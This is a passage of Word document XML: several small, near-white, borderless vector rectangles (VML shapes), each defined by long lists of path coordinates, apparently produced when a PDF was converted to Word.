,5775,4736,5772,4736,5769,4736,5766,4736,5762,4736,5759,4736,5755,4736,5752,4736,5748,4736,5744,4736,5740,4736,5736,4736,5732,4736,5728,4736,5724,4736,5719,4736,5715,4736,5711,4736,5706,4736,5701,4736,5697,4736,5692,4736,5687,4736,5682,4736,5676,4736,5671,4736,5666,4736,5660,4736,5655,4736,5649,4736,5643,4736,5638,4736,5632,4736,5626,4736,5619,4736,5613,4736,5607e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:279.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,5590" coordsize="130,270">
        <v:shape style="position:absolute;left:6390;top:5590;width:130;height:270" coordorigin="6390,5590" coordsize="130,270" path="m6417,5607l6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6417,5607,6418,5607,6418,5607,6418,5607,6418,5607,6418,5607,6418,5607,6418,5607,6418,5607,6418,5607,6418,5607,6418,5607,6419,5607,6419,5607,6419,5607,6419,5607,6419,5607,6420,5607,6420,5607,6420,5607,6420,5607,6421,5607,6421,5607,6421,5607,6421,5607,6422,5607,6422,5607,6423,5607,6423,5607,6423,5607,6424,5607,6424,5607,6425,5607,6425,5607,6426,5607,6426,5607,6427,5607,6427,5607,6428,5607,6428,5607,6429,5607,6430,5607,6430,5607,6431,5607,6432,5607,6433,5607,6433,5607,6434,5607,6435,5607,6436,5607,6437,5607,6438,5607,6439,5607,6440,5607,6441,5607,6442,5607,6443,5607,6444,5607,6445,5607,6446,5607,6447,5607,6449,5607,6450,5607,6451,5607,6452,5607,6454,5607,6455,5607,6457,5607,6458,5607,6459,5607,6461,5607,6463,5607,6464,5607,6466,5607,6467,5607,6469,5607,6471,5607,6473,5607,6475,5607,6476,5607,6478,5607,6480,5607,6482,5607,6484,5607,6486,5607,6488,5607,6491,5607,6493,5607,6495,5607,6497,5607,6500,5607,6502,5607,6505,5607,6507,5607,6509,5607,6512,5607,6515,5607,6517,5607,6520,5607,6523,5607,6526,5607,6528,5607,6531,5607,6534,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5607,6537,5608,6537,5608,6537,5608,6537,5608,6537,5608,6537,5608,6537,5609,6537,5609,6537,5609,6537,5609,6537,5610,6537,5610,6537,5611,6537,5611,6537,5611,6537,5612,6537,5612,6537,5613,6537,5613,6537,5614,6537,5614,6537,5615,6537,5616,6537,5617,6537,5617,6537,5618,6537,5619,6537,5620,6537,5621,6537,5622,6537,5623,6537,5624,6537,5625,6537,5626,6537,5627,6537,5628,6537,5629,6537,5631,6537,5632,6537,5633,6537,5635,6537,5636,6537,5638,6537,5640,6537,5641,6537,5643,6537,5645,6537,5647,6537,5648,6537,5650,6537,5652,6537,5654,6537,5657,6537,5659,6537,5661,6537,5663,6537,5666,6537,5668,6537,5671,6537,5673,6537,5676,6537,5679,6537,5681,6537,5684,6537,5687,6537,5690,6537,5693,6537,5697,6537,5700,6537,5703,6537,5707,6537,5710,6537,5714,6537,5717,6537,5721,6537,5725,6537,5729,6537,5733,6537,5737,6537,5741,6537,5745,6537,5749,6537,5754,6537,5758,6537,5763,6537,5767,6537,5772,6537,5777,6537,5782,6537,5787,6537,5792,6537,5798,6537,5803,6537,5808,6537,5814,6537,5820,6537,5825,6537,5831,6537,5837,6537,5843,6537,5849,6537,5856,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6537,5862,6536,5862,6536,5862,6536,5862,6536,5862,6536,5862,6536,5862,6536,5862,6535,5862,6535,5862,6535,5862,6535,5862,6534,5862,6534,5862,6534,5862,6534,5862,6533,5862,6533,5862,6533,5862,6532,5862,6532,5862,6532,5862,6531,5862,6531,5862,6530,5862,6530,5862,6529,5862,6529,5862,6528,5862,6528,5862,6527,5862,6527,5862,6526,5862,6525,5862,6525,5862,6524,5862,6523,5862,6523,5862,6522,5862,6521,5862,6520,5862,6519,5862,6519,5862,6518,5862,6517,5862,6516,5862,6515,5862,6514,5862,6513,5862,6512,5862,6511,5862,6510,5862,6508,5862,6507,5862,6506,5862,6505,5862,6503,5862,6502,5862,6501,5862,6499,5862,6498,5862,6497,5862,6495,5862,6494,5862,6492,5862,6490,5862,6489,5862,6487,5862,6485,5862,6484,5862,6482,5862,6480,5862,6478,5862,6476,5862,6474,5862,6472,5862,6470,5862,6468,5862,6466,5862,6464,5862,6462,5862,6459,5862,6457,5862,6455,5862,6452,5862,6450,5862,6448,5862,6445,5862,6442,5862,6440,5862,6437,5862,6434,5862,6432,5862,6429,5862,6426,5862,6423,5862,6420,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5862,6417,5861,6417,5861,6417,5861,6417,5861,6417,5861,6417,5861,6417,5861,6417,5860,6417,5860,6417,5860,6417,5860,6417,5859,6417,5859,6417,5859,6417,5858,6417,5858,6417,5857,6417,5857,6417,5857,6417,5856,6417,5855,6417,5855,6417,5854,6417,5854,6417,5853,6417,5852,6417,5852,6417,5851,6417,5850,6417,5849,6417,5848,6417,5847,6417,5846,6417,5845,6417,5844,6417,5843,6417,5842,6417,5841,6417,5839,6417,5838,6417,5837,6417,5835,6417,5834,6417,5832,6417,5831,6417,5829,6417,5828,6417,5826,6417,5824,6417,5822,6417,5820,6417,5818,6417,5816,6417,5814,6417,5812,6417,5810,6417,5808,6417,5805,6417,5803,6417,5801,6417,5798,6417,5795,6417,5793,6417,5790,6417,5787,6417,5784,6417,5781,6417,5778,6417,5775,6417,5772,6417,5769,6417,5766,6417,5762,6417,5759,6417,5755,6417,5752,6417,5748,6417,5744,6417,5740,6417,5736,6417,5732,6417,5728,6417,5724,6417,5719,6417,5715,6417,5711,6417,5706,6417,5701,6417,5697,6417,5692,6417,5687,6417,5682,6417,5676,6417,5671,6417,5666,6417,5660,6417,5655,6417,5649,6417,5643,6417,5638,6417,5632,6417,5626,6417,5619,6417,5613,6417,5607e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:175.500pt;margin-top:292.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3510,5850" coordsize="130,270">
        <v:shape style="position:absolute;left:3510;top:5850;width:130;height:270" coordorigin="3510,5850" coordsize="130,270" path="m3521,5877l3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3521,5877,3522,5877,3522,5877,3522,5877,3522,5877,3522,5877,3522,5877,3522,5877,3523,5877,3523,5877,3523,5877,3523,5877,3523,5877,3524,5877,3524,5877,3524,5877,3524,5877,3525,5877,3525,5877,3525,5877,3526,5877,3526,5877,3526,5877,3527,5877,3527,5877,3528,5877,3528,5877,3529,5877,3529,5877,3530,5877,3530,5877,3531,5877,3531,5877,3532,5877,3533,5877,3533,5877,3534,5877,3535,5877,3535,5877,3536,5877,3537,5877,3538,5877,3539,5877,3539,5877,3540,5877,3541,5877,3542,5877,3543,5877,3544,5877,3545,5877,3546,5877,3547,5877,3548,5877,3550,5877,3551,5877,3552,5877,3553,5877,3555,5877,3556,5877,3557,5877,3559,5877,3560,5877,3562,5877,3563,5877,3565,5877,3566,5877,3568,5877,3569,5877,3571,5877,3573,5877,3574,5877,3576,5877,3578,5877,3580,5877,3582,5877,3584,5877,3586,5877,3588,5877,3590,5877,3592,5877,3594,5877,3596,5877,3599,5877,3601,5877,3603,5877,3606,5877,3608,5877,3611,5877,3613,5877,3616,5877,3618,5877,3621,5877,3624,5877,3626,5877,3629,5877,3632,5877,3635,5877,3638,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5877,3641,5878,3641,5878,3641,5878,3641,5878,3641,5878,3641,5878,3641,5879,3641,5879,3641,5879,3641,5879,3641,5880,3641,5880,3641,5880,3641,5881,3641,5881,3641,5881,3641,5882,3641,5882,3641,5883,3641,5883,3641,5884,3641,5885,3641,5885,3641,5886,3641,5887,3641,5887,3641,5888,3641,5889,3641,5890,3641,5891,3641,5892,3641,5893,3641,5894,3641,5895,3641,5896,3641,5897,3641,5898,3641,5899,3641,5901,3641,5902,3641,5904,3641,5905,3641,5906,3641,5908,3641,5910,3641,5911,3641,5913,3641,5915,3641,5917,3641,5919,3641,5920,3641,5922,3641,5925,3641,5927,3641,5929,3641,5931,3641,5933,3641,5936,3641,5938,3641,5941,3641,5943,3641,5946,3641,5949,3641,5952,3641,5954,3641,5957,3641,5960,3641,5964,3641,5967,3641,5970,3641,5973,3641,5977,3641,5980,3641,5984,3641,5987,3641,5991,3641,5995,3641,5999,3641,6003,3641,6007,3641,6011,3641,6015,3641,6019,3641,6024,3641,6028,3641,6033,3641,6038,3641,6042,3641,6047,3641,6052,3641,6057,3641,6062,3641,6068,3641,6073,3641,6078,3641,6084,3641,6090,3641,6095,3641,6101,3641,6107,3641,6113,3641,6119,3641,6126,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3641,6132,3640,6132,3640,6132,3640,6132,3640,6132,3640,6132,3640,6132,3640,6132,3640,6132,3640,6132,3640,6132,3639,6132,3639,6132,3639,6132,3639,6132,3639,6132,3638,6132,3638,6132,3638,6132,3638,6132,3638,6132,3637,6132,3637,6132,3637,6132,3636,6132,3636,6132,3636,6132,3635,6132,3635,6132,3634,6132,3634,6132,3633,6132,3633,6132,3632,6132,3632,6132,3631,6132,3631,6132,3630,6132,3630,6132,3629,6132,3628,6132,3628,6132,3627,6132,3626,6132,3625,6132,3625,6132,3624,6132,3623,6132,3622,6132,3621,6132,3620,6132,3619,6132,3618,6132,3617,6132,3616,6132,3615,6132,3614,6132,3613,6132,3612,6132,3611,6132,3610,6132,3608,6132,3607,6132,3606,6132,3604,6132,3603,6132,3602,6132,3600,6132,3599,6132,3597,6132,3596,6132,3594,6132,3592,6132,3591,6132,3589,6132,3587,6132,3585,6132,3584,6132,3582,6132,3580,6132,3578,6132,3576,6132,3574,6132,3572,6132,3570,6132,3567,6132,3565,6132,3563,6132,3561,6132,3558,6132,3556,6132,3554,6132,3551,6132,3549,6132,3546,6132,3543,6132,3541,6132,3538,6132,3535,6132,3532,6132,3530,6132,3527,6132,3524,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6132,3521,6131,3521,6131,3521,6131,3521,6131,3521,6131,3521,6131,3521,6130,3521,6130,3521,6130,3521,6130,3521,6129,3521,6129,3521,6129,3521,6128,3521,6128,3521,6128,3521,6127,3521,6127,3521,6126,3521,6126,3521,6125,3521,6124,3521,6124,3521,6123,3521,6122,3521,6122,3521,6121,3521,6120,3521,6119,3521,6118,3521,6117,3521,6116,3521,6115,3521,6114,3521,6113,3521,6112,3521,6111,3521,6110,3521,6108,3521,6107,3521,6105,3521,6104,3521,6103,3521,6101,3521,6099,3521,6098,3521,6096,3521,6094,3521,6092,3521,6091,3521,6089,3521,6087,3521,6084,3521,6082,3521,6080,3521,6078,3521,6076,3521,6073,3521,6071,3521,6068,3521,6066,3521,6063,3521,6060,3521,6057,3521,6055,3521,6052,3521,6049,3521,6046,3521,6042,3521,6039,3521,6036,3521,6032,3521,6029,3521,6025,3521,6022,3521,6018,3521,6014,3521,6010,3521,6006,3521,6002,3521,5998,3521,5994,3521,5990,3521,5985,3521,5981,3521,5976,3521,5971,3521,5967,3521,5962,3521,5957,3521,5952,3521,5947,3521,5941,3521,5936,3521,5931,3521,5925,3521,5919,3521,5914,3521,5908,3521,5902,3521,5896,3521,5890,3521,5883,3521,5877e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:325.500pt;margin-top:292.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6510,5850" coordsize="130,270">
        <v:shape style="position:absolute;left:6510;top:5850;width:130;height:270" coordorigin="6510,5850" coordsize="130,270" path="m6522,5877l6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6522,5877,6523,5877,6523,5877,6523,5877,6523,5877,6523,5877,6523,5877,6523,5877,6523,5877,6523,5877,6523,5877,6523,5877,6524,5877,6524,5877,6524,5877,6524,5877,6524,5877,6524,5877,6525,5877,6525,5877,6525,5877,6525,5877,6526,5877,6526,5877,6526,5877,6527,5877,6527,5877,6527,5877,6528,5877,6528,5877,6528,5877,6529,5877,6529,5877,6530,5877,6530,5877,6531,5877,6531,5877,6532,5877,6532,5877,6533,5877,6534,5877,6534,5877,6535,5877,6535,5877,6536,5877,6537,5877,6538,5877,6538,5877,6539,5877,6540,5877,6541,5877,6542,5877,6543,5877,6544,5877,6545,5877,6546,5877,6547,5877,6548,5877,6549,5877,6550,5877,6551,5877,6552,5877,6554,5877,6555,5877,6556,5877,6557,5877,6559,5877,6560,5877,6562,5877,6563,5877,6565,5877,6566,5877,6568,5877,6569,5877,6571,5877,6573,5877,6574,5877,6576,5877,6578,5877,6580,5877,6581,5877,6583,5877,6585,5877,6587,5877,6589,5877,6591,5877,6594,5877,6596,5877,6598,5877,6600,5877,6602,5877,6605,5877,6607,5877,6610,5877,6612,5877,6615,5877,6617,5877,6620,5877,6622,5877,6625,5877,6628,5877,6631,5877,6633,5877,6636,5877,6639,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5877,6642,5878,6642,5878,6642,5878,6642,5878,6642,5878,6642,5878,6642,5879,6642,5879,6642,5879,6642,5879,6642,5880,6642,5880,6642,5880,6642,5881,6642,5881,6642,5881,6642,5882,6642,5882,6642,5883,6642,5883,6642,5884,6642,5885,6642,5885,6642,5886,6642,5887,6642,5887,6642,5888,6642,5889,6642,5890,6642,5891,6642,5892,6642,5893,6642,5894,6642,5895,6642,5896,6642,5897,6642,5898,6642,5899,6642,5901,6642,5902,6642,5904,6642,5905,6642,5906,6642,5908,6642,5910,6642,5911,6642,5913,6642,5915,6642,5917,6642,5919,6642,5920,6642,5922,6642,5925,6642,5927,6642,5929,6642,5931,6642,5933,6642,5936,6642,5938,6642,5941,6642,5943,6642,5946,6642,5949,6642,5952,6642,5954,6642,5957,6642,5960,6642,5964,6642,5967,6642,5970,6642,5973,6642,5977,6642,5980,6642,5984,6642,5987,6642,5991,6642,5995,6642,5999,6642,6003,6642,6007,6642,6011,6642,6015,6642,6019,6642,6024,6642,6028,6642,6033,6642,6038,6642,6042,6642,6047,6642,6052,6642,6057,6642,6062,6642,6068,6642,6073,6642,6078,6642,6084,6642,6090,6642,6095,6642,6101,6642,6107,6642,6113,6642,6119,6642,6126,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6642,6132,6641,6132,6641,6132,6641,6132,6641,6132,6641,6132,6641,6132,6641,6132,6640,6132,6640,6132,6640,6132,6640,6132,6640,6132,6639,6132,6639,6132,6639,6132,6638,6132,6638,6132,6638,6132,6637,6132,6637,6132,6637,6132,6636,6132,6636,6132,6635,6132,6635,6132,6634,6132,6634,6132,6633,6132,6633,6132,6632,6132,6632,6132,6631,6132,6630,6132,6630,6132,6629,6132,6628,6132,6628,6132,6627,6132,6626,6132,6625,6132,6625,6132,6624,6132,6623,6132,6622,6132,6621,6132,6620,6132,6619,6132,6618,6132,6617,6132,6616,6132,6615,6132,6613,6132,6612,6132,6611,6132,6610,6132,6609,6132,6607,6132,6606,6132,6604,6132,6603,6132,6602,6132,6600,6132,6599,6132,6597,6132,6595,6132,6594,6132,6592,6132,6590,6132,6589,6132,6587,6132,6585,6132,6583,6132,6581,6132,6579,6132,6577,6132,6575,6132,6573,6132,6571,6132,6569,6132,6567,6132,6564,6132,6562,6132,6560,6132,6557,6132,6555,6132,6553,6132,6550,6132,6548,6132,6545,6132,6542,6132,6540,6132,6537,6132,6534,6132,6531,6132,6528,6132,6525,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6132,6522,6131,6522,6131,6522,6131,6522,6131,6522,6131,6522,6131,6522,6130,6522,6130,6522,6130,6522,6130,6522,6129,6522,6129,6522,6129,6522,6128,6522,6128,6522,6128,6522,6127,6522,6127,6522,6126,6522,6126,6522,6125,6522,6124,6522,6124,6522,6123,6522,6122,6522,6122,6522,6121,6522,6120,6522,6119,6522,6118,6522,6117,6522,6116,6522,6115,6522,6114,6522,6113,6522,6112,6522,6111,6522,6110,6522,6108,6522,6107,6522,6105,6522,6104,6522,6103,6522,6101,6522,6099,6522,6098,6522,6096,6522,6094,6522,6092,6522,6091,6522,6089,6522,6087,6522,6084,6522,6082,6522,6080,6522,6078,6522,6076,6522,6073,6522,6071,6522,6068,6522,6066,6522,6063,6522,6060,6522,6057,6522,6055,6522,6052,6522,6049,6522,6046,6522,6042,6522,6039,6522,6036,6522,6032,6522,6029,6522,6025,6522,6022,6522,6018,6522,6014,6522,6010,6522,6006,6522,6002,6522,5998,6522,5994,6522,5990,6522,5985,6522,5981,6522,5976,6522,5971,6522,5967,6522,5962,6522,5957,6522,5952,6522,5947,6522,5941,6522,5936,6522,5931,6522,5925,6522,5919,6522,5914,6522,5908,6522,5902,6522,5896,6522,5890,6522,5883,6522,5877e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:324.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,6490" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:6490;width:130;height:270" coordorigin="4710,6490" coordsize="130,270" path="m4736,6507l4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4736,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4737,6507,4738,6507,4738,6507,4738,6507,4738,6507,4738,6507,4739,6507,4739,6507,4739,6507,4739,6507,4739,6507,4740,6507,4740,6507,4740,6507,4741,6507,4741,6507,4741,6507,4742,6507,4742,6507,4742,6507,4743,6507,4743,6507,4744,6507,4744,6507,4745,6507,4745,6507,4746,6507,4746,6507,4747,6507,4748,6507,4748,6507,4749,6507,4750,6507,4750,6507,4751,6507,4752,6507,4753,6507,4753,6507,4754,6507,4755,6507,4756,6507,4757,6507,4758,6507,4759,6507,4760,6507,4761,6507,4762,6507,4763,6507,4764,6507,4765,6507,4766,6507,4768,6507,4769,6507,4770,6507,4772,6507,4773,6507,4774,6507,4776,6507,4777,6507,4779,6507,4780,6507,4782,6507,4783,6507,4785,6507,4787,6507,4788,6507,4790,6507,4792,6507,4794,6507,4796,6507,4797,6507,4799,6507,4801,6507,4803,6507,4806,6507,4808,6507,4810,6507,4812,6507,4814,6507,4817,6507,4819,6507,4821,6507,4824,6507,4826,6507,4829,6507,4831,6507,4834,6507,4836,6507,4839,6507,4842,6507,4845,6507,4848,6507,4850,6507,4853,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6507,4856,6508,4856,6508,4856,6508,4856,6508,4856,6508,4856,6508,4856,6508,4856,6508,4856,6508,4856,6509,4856,6509,4856,6509,4856,6509,4856,6510,4856,6510,4856,6510,4856,6511,4856,6511,4856,6511,4856,6512,4856,6512,4856,6513,4856,6513,4856,6514,4856,6514,4856,6515,4856,6516,4856,6516,4856,6517,4856,6518,4856,6518,4856,6519,4856,6520,4856,6521,4856,6522,4856,6523,4856,6524,4856,6525,4856,6526,4856,6527,4856,6529,4856,6530,4856,6531,4856,6532,4856,6534,4856,6535,4856,6537,4856,6538,4856,6540,4856,6542,4856,6543,4856,6545,4856,6547,4856,6549,4856,6551,4856,6553,4856,6555,4856,6557,4856,6559,4856,6561,4856,6564,4856,6566,4856,6569,4856,6571,4856,6574,4856,6576,4856,6579,4856,6582,4856,6585,4856,6588,4856,6591,4856,6594,4856,6597,4856,6600,4856,6604,4856,6607,4856,6610,4856,6614,4856,6618,4856,6621,4856,6625,4856,6629,4856,6633,4856,6637,4856,6641,4856,6645,4856,6650,4856,6654,4856,6659,4856,6663,4856,6668,4856,6673,4856,6678,4856,6683,4856,6688,4856,6693,4856,6698,4856,6703,4856,6709,4856,6714,4856,6720,4856,6726,4856,6732,4856,6738,4856,6744,4856,6750,4856,6756,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4856,6762,4855,6762,4855,6762,4855,6762,4855,6762,4855,6762,4855,6762,4855,6762,4854,6762,4854,6762,4854,6762,4854,6762,4853,6762,4853,6762,4853,6762,4853,6762,4852,6762,4852,6762,4852,6762,4851,6762,4851,6762,4850,6762,4850,6762,4850,6762,4849,6762,4849,6762,4848,6762,4848,6762,4847,6762,4846,6762,4846,6762,4845,6762,4845,6762,4844,6762,4843,6762,4843,6762,4842,6762,4841,6762,4840,6762,4839,6762,4839,6762,4838,6762,4837,6762,4836,6762,4835,6762,4834,6762,4833,6762,4832,6762,4831,6762,4830,6762,4829,6762,4828,6762,4826,6762,4825,6762,4824,6762,4823,6762,4821,6762,4820,6762,4819,6762,4817,6762,4816,6762,4814,6762,4813,6762,4811,6762,4810,6762,4808,6762,4806,6762,4805,6762,4803,6762,4801,6762,4799,6762,4797,6762,4795,6762,4793,6762,4791,6762,4789,6762,4787,6762,4785,6762,4783,6762,4781,6762,4779,6762,4776,6762,4774,6762,4772,6762,4769,6762,4767,6762,4764,6762,4762,6762,4759,6762,4756,6762,4754,6762,4751,6762,4748,6762,4745,6762,4742,6762,4739,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6762,4736,6761,4736,6761,4736,6761,4736,6761,4736,6761,4736,6760,4736,6760,4736,6760,4736,6759,4736,6759,4736,6759,4736,6758,4736,6758,4736,6757,4736,6757,4736,6756,4736,6756,4736,6755,4736,6755,4736,6754,4736,6753,4736,6753,4736,6752,4736,6751,4736,6750,4736,6750,4736,6749,4736,6748,4736,6747,4736,6746,4736,6745,4736,6743,4736,6742,4736,6741,4736,6740,4736,6739,4736,6737,4736,6736,4736,6734,4736,6733,4736,6731,4736,6730,4736,6728,4736,6726,4736,6725,4736,6723,4736,6721,4736,6719,4736,6717,4736,6715,4736,6713,4736,6710,4736,6708,4736,6706,4736,6704,4736,6701,4736,6699,4736,6696,4736,6693,4736,6691,4736,6688,4736,6685,4736,6682,4736,6679,4736,6676,4736,6673,4736,6669,4736,6666,4736,6663,4736,6659,4736,6656,4736,6652,4736,6648,4736,6645,4736,6641,4736,6637,4736,6633,4736,6628,4736,6624,4736,6620,4736,6616,4736,6611,4736,6606,4736,6602,4736,6597,4736,6592,4736,6587,4736,6582,4736,6577,4736,6572,4736,6566,4736,6561,4736,6555,4736,6550,4736,6544,4736,6538,4736,6532,4736,6526,4736,6520,4736,6514,4736,6507e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:324.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,6490" coordsize="130,270">
        <v:shape style="position:absolute;left:6390;top:6490;width:130;height:270" coordorigin="6390,6490" coordsize="130,270" path="m6417,6507l6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6417,6507,6418,6507,6418,6507,6418,6507,6418,6507,6418,6507,6418,6507,6418,6507,6418,6507,6418,6507,6418,6507,6418,6507,6419,6507,6419,6507,6419,6507,6419,6507,6419,6507,6420,6507,6420,6507,6420,6507,6420,6507,6421,6507,6421,6507,6421,6507,6421,6507,6422,6507,6422,6507,6423,6507,6423,6507,6423,6507,6424,6507,6424,6507,6425,6507,6425,6507,6426,6507,6426,6507,6427,6507,6427,6507,6428,6507,6428,6507,6429,6507,6430,6507,6430,6507,6431,6507,6432,6507,6433,6507,6433,6507,6434,6507,6435,6507,6436,6507,6437,6507,6438,6507,6439,6507,6440,6507,6441,6507,6442,6507,6443,6507,6444,6507,6445,6507,6446,6507,6447,6507,6449,6507,6450,6507,6451,6507,6452,6507,6454,6507,6455,6507,6457,6507,6458,6507,6459,6507,6461,6507,6463,6507,6464,6507,6466,6507,6467,6507,6469,6507,6471,6507,6473,6507,6475,6507,6476,6507,6478,6507,6480,6507,6482,6507,6484,6507,6486,6507,6488,6507,6491,6507,6493,6507,6495,6507,6497,6507,6500,6507,6502,6507,6505,6507,6507,6507,6509,6507,6512,6507,6515,6507,6517,6507,6520,6507,6523,6507,6526,6507,6528,6507,6531,6507,6534,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6507,6537,6508,6537,6508,6537,6508,6537,6508,6537,6508,6537,6508,6537,6508,6537,6508,6537,6508,6537,6509,6537,6509,6537,6509,6537,6509,6537,6510,6537,6510,6537,6510,6537,6511,6537,6511,6537,6511,6537,6512,6537,6512,6537,6513,6537,6513,6537,6514,6537,6514,6537,6515,6537,6516,6537,6516,6537,6517,6537,6518,6537,6518,6537,6519,6537,6520,6537,6521,6537,6522,6537,6523,6537,6524,6537,6525,6537,6526,6537,6527,6537,6529,6537,6530,6537,6531,6537,6532,6537,6534,6537,6535,6537,6537,6537,6538,6537,6540,6537,6542,6537,6543,6537,6545,6537,6547,6537,6549,6537,6551,6537,6553,6537,6555,6537,6557,6537,6559,6537,6561,6537,6564,6537,6566,6537,6569,6537,6571,6537,6574,6537,6576,6537,6579,6537,6582,6537,6585,6537,6588,6537,6591,6537,6594,6537,6597,6537,6600,6537,6604,6537,6607,6537,6610,6537,6614,6537,6618,6537,6621,6537,6625,6537,6629,6537,6633,6537,6637,6537,6641,6537,6645,6537,6650,6537,6654,6537,6659,6537,6663,6537,6668,6537,6673,6537,6678,6537,6683,6537,6688,6537,6693,6537,6698,6537,6703,6537,6709,6537,6714,6537,6720,6537,6726,6537,6732,6537,6738,6537,6744,6537,6750,6537,6756,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6537,6762,6536,6762,6536,6762,6536,6762,6536,6762,6536,6762,6536,6762,6536,6762,6535,6762,6535,6762,6535,6762,6535,6762,6534,6762,6534,6762,6534,6762,6534,6762,6533,6762,6533,6762,6533,6762,6532,6762,6532,6762,6532,6762,6531,6762,6531,6762,6530,6762,6530,6762,6529,6762,6529,6762,6528,6762,6528,6762,6527,6762,6527,6762,6526,6762,6525,6762,6525,6762,6524,6762,6523,6762,6523,6762,6522,6762,6521,6762,6520,6762,6519,6762,6519,6762,6518,6762,6517,6762,6516,6762,6515,6762,6514,6762,6513,6762,6512,6762,6511,6762,6510,6762,6508,6762,6507,6762,6506,6762,6505,6762,6503,6762,6502,6762,6501,6762,6499,6762,6498,6762,6497,6762,6495,6762,6494,6762,6492,6762,6490,6762,6489,6762,6487,6762,6485,6762,6484,6762,6482,6762,6480,6762,6478,6762,6476,6762,6474,6762,6472,6762,6470,6762,6468,6762,6466,6762,6464,6762,6462,6762,6459,6762,6457,6762,